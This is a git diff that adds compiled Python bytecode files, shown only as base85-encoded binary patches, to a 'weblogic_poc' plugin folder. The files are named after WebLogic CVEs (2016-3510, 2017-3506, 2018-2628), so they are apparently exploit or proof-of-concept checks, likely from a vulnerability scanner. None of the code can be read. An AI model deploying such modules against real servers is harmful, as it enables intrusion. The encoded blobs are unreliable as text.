zN6f&q92*Lb1WGA5Ai@|qAek_E=p-q|Cec*+QIc}zr-9{JfeUy!B(#iML%{z12Sxqc z`$OZ>ZyE;#v)>)Lt#Q$+^X?lLY#_Cn#yT-D#39Kbj#WJVjM(S{Ci@ zQEVLGUu+!mkKyD|$JjK;affoyDd|Ojw=K4m_Ud%&T`x#N{n*$Qfgeg{LleR2O_=4t zyH*=PdyaR{vjUyA*rl^KN3L{`(nQ_)Awocm>{ko7_uz&&zH6I_Kf7KpaYgg?j>Z+R zU$Fxx4P50M*nvDXZSkSakc?dN-4W*?)dWwS)`v8D$Qg$Tvn7Z3r~bQ&nYzH`Nd!Ye zzrY1LbL8#^SB}0Ru8@G&_G^3FE8ChG|gBs5Z;@uq6$0_R5;ftF2WjH}Xm*lZ&$@R9R0h0ZU66-~k9FJ(bILq~e|7-r9=j*-Qo~=d`$Z jGq8=|b)zGH5c zMP&<-%B||9&vZ(ia;MU%o~s-;UOlo^qb2Foup~9TB(Hz=tf7`=qPH0J#RUW7E75Qh z4mw=~z=kd@IG&1L$%sUdE(Qz{av-$8iCiy@oXAJu451J=U?M`)#*IS@0UQ~pi3dd* zhB3TwrOF`PO1m(1S4LI$i8a-i+6&z@JuoP+Lhsitxn*t3OQofD#-Qm1svL*HK=h(vm6d!hpFx0$U-XlSSMR`VTtD8SS}0jsm1gMw%dnjhzjU z0;L49FOv zS)4p!!jATNzz}EYksc#l4z!7oCL&V>^ZXzqck3qIW~+HEUC-8{c1G@3MovLS-a$sr z!|X&xUp?g2Y-2rZ<9mgu9Wni|^@Hn&lbb?0IQlkCjgG{dE34u(e@VW+DO>H6F*!RA zp`=Bwh+$UXmsIdOY#uSQ`;pW0PKXj3S9vEtLV~;#_#mcl&{LG?Dd3-M8*Q^wx@L;% z#|=??(AdFST6%zL8QZA2T^8_2luuIMDqnu|(!=m$47iVzJJeUXUEQvUDJp;cxwFPu zqxopXXir?2%D!hBTNTr|QaKCPQXu`!%FD(pMzi#?(J8~#+_$)Jh7=p*sfb}}j{pnR z^^I}%&nOQF3tpPqER^c^Ns0xb*gBk6s#9D@Q?N7`-Z-kJvdG<-v9M0xmCq?&=_P&5#5vqpI2a8>t!;3KVeVjN4 z7EV4=NFsT@oG=g0Fe&n*{Q!7dh&dBZf^?!a&hE&QRM?1&H2sS_3XiMO?wQ?SDfA3H zH~cZe;EBwwzuFk_w-)}2xXXA;GVW8IK1%{13n)vG`>uoS4mhRV&r8Tn#`Y2-i6e4{ zIKuK)ylZX9bpY=$@qtf*Fpdtw>5wEHdntz-u01)mq?{ZoLuzn52~W(naWd!% zL^KeV>$7eEq!frC1!2)S>|SG!Lf!rYL!89Wkqa#(4p6}bxZC)ACUB#`4x-e@*G+N% zs2ocL8^{#L=x|FPVUuv6CmVsXF_d6l>JW^^fap+r%#{KTGxg&(<@%8hLqDHv8<;B-QU3 zseJOpr9^JDSJs=eRc)^-WT^6qjp*{~dL;64CR@2FhYi$03gn%*xUveG9P z!;NfH9luAEg({gP^8l>WA^fw4QJO&WtBdIF1udV$OB->qHtfzv5wvU@ua$SourZZR z85YXCP|2Kj6*0D2dxC20nAc!;nun2B9?Vn0%*tX$(Z@}Sg?{~sSO5O=-{08&P7(jR z{=1)EfBVsv z_WW!mBkpAQfDVOdB`@XX#xPgw$$6PvIJ3Drk80fzkRF>2y zkrWdyE#4#~F*}*pC?+f0`NYDP8qY4CIGyi1b@G|7Hcp*>>BPbd`BY1`DU!Rs*;bKK z1xVCt=Myh3yz>0Xh2x5R1cJ-i%0_k{I?X;!H|k!qq?EOWnNiL*n?5RZAdl zzC$%KTInH@6{WrYo6(v?2TxKxMK%SZhY77ey|ykkSLNquI;}@=(_5fks)5>?S+CV6 O>j&!f`cz$kwtoZiNGyy1 literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..fff3108bd1424ff910aa6044014b8042388709c9 GIT binary patch literal 11041 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 literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e9debdff1b10d3783a4f9c2b2a39036586bd8c1b GIT binary patch literal 2528 zcmahLU2oe|)Yo=Cnzidd&@m9m1TmJbiPLTEMw=GevVjn*CbjztLB{pHOWZoPckfM; zS`I=Q5|d!;Z6KJSgBL&o@c=Jqzr?SoMSJ3XPn_!{ZPUSaU7vIB`99|!pLBj`C?mm| z(7&tH2PEk)apYCYlkg_VrC{3 zn~LBVp%wz_z+*-ZPQa|_8ju7VfDi!$N+Ixd&G-<`uYrCK3NA1!I)IoBKoE3I?|3R{ z$6_Nwzhebp>@}ITxU5YU#-}wnPoA3AS_07Zsfo!#F{iyvtTj(R zQ5-MA-?(;Od5pOEi%ao-0`~FdWH1tY0dvz<&7_R*nTyNk@@H~tkh#bR&CgYd z%cJC+Wf7kT!yTM|&vdH|vr2-&1<&Omkzd~Mi3QCOFVTsjPZ!{2-vbDxP3XpZh&_$v zP&zENC9H(fT9Rf%=)}|FoM@wsB1fyh50U6huHf{oL|YE!Rkbbi#AXr?gz`OkGletv zP+Pt%xkpurr`IwxL{eKpQjo?61RcZERz6a$NLM9Sz9QklP+m*2FYu7S^bS7QRzr13 z!oyuGiQZm})Eei0kP>i8*B>H1cu{XUEZ<}%*B3mGV%s&jM=yAki+s(O6!A5P24bG+ z6L)>;th-Je&nFsG)MZm$@=UgClUX%VH(3F=f>rQnRTmo_bYnd|I~yC^WAYthVnTal zU^G3tHgy?5T>BR9`V!D)zjeZE9-hfEZc?7r`-Mt+=OXt~OM3r(m-PMp z)RTrdyItMif;-JV@8ONE$6eXp7tpbC?tz#EIWQnk3d zS&*%iu9*#ocP_LtTNtgBDtaG@it!Rj!K-^EXaBD`gM)oy#l{S1zkmFLzrXo)d-KyK zS#i9oZEgMX)z;k~-<`WOw{`p0)}ObxZhpD-`JL_ix3_=)_MiJ-FI+mChv|Gee{!NY z*%%cT^7|}o-~D;}hmW`a_-yOuZ++sqfhZH-3TxWD7Nse<-XM&#NcBC&qlCyD4r2aB zG9^)x5tCZAC{d+e!;c2ew#3MVk)KOMN`pG(w9qr4K*ARDJ(rOPfgT*7a6d`(2*mfW z{MJ;(-w?yRp7*IIzT?Vb{=AK`Lz?jQFIlGhD8Y9cRoi8iUR?~|vnr5|A+k3__62_< zQh+)FPM8KjLK&16&km1I+=ja; literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..043f80f31567dfeb2acf45a122477718e7af2509 GIT binary patch literal 7184 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 literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e71ff90487184bf21e1c0004fc444a2acec002b4 GIT binary patch literal 447 zcmZXR!D_=W42GRBSPAqUd|Lx;eIKEW(d&9Cy9|St*``ZL6O*)*g5P9MuvhAJZ?V&U zIm<2+_?M;6vV{FOon``-&Oh`z5#o!3(GZIVtbPKq;zihGEAq6w0mvl5doS*vbJ{TvU6KgHvbd8KJBWe*Jt-ux4X)aZw)$DO?4z%`pb1v O99ny--HN}g#}YsL-+4g* literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..62b47651a9260b69d736d719ca78c747ddbe6459 GIT binary patch literal 1270 zcmah}&u`pB6rLH|yN=UTRjVqhl*8uKE|B%YaTQfnK|PfmsOZ5M4aPGhyX@L##%`6= zk&s%^AOSsbfmBUZBt#D+po$_uJ@YsCN}Xi?g^C03&1NGcBswd9@6G$>$G6{%eR*!q zBhWnmLHM^t$Y0o*Ht3T}@aO4e%3A;}NOE{u&hXl503Kyay8)D{T zrmjmmXbSHf30yg2^4W9bHVr)KNLPBd86|>UBkdE>30;NFCES$dF!% zNr((DTP1`EUf^x$0U7!&C?O4iLmI`(&rd4xIMnWpxb}CEf zs&bY5q>wt-m9;8!h1aE;)p?W`n#ZY-ZM$NHs_ZOPd1V!9SW)!@Q72&Bi{PzZn61Za zks2*!Djmo;4_B7n?h7%LHzOsl#ZmI#LN+Wwk`8am4^d*wvosDzQ35Whci*}CMz`C^ z)~iNe5BoRdDfFcQK%CXsKlt{?{hhnhzqbF?_x08< 